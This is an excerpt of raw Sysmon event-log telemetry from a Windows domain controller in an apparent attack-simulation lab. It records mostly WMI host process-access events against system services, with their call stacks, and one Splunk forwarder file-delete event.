16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E16EA3886B92F9A0AC3EC108492F7E6,SHA256=1548A5BE3A26A63ABA3E6672CD5D6EE7DDF88C3FE521A87CBC85D9CF5B779BF8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7DAA-00000000AD01}14492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7DAA-00000000AD01}14492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\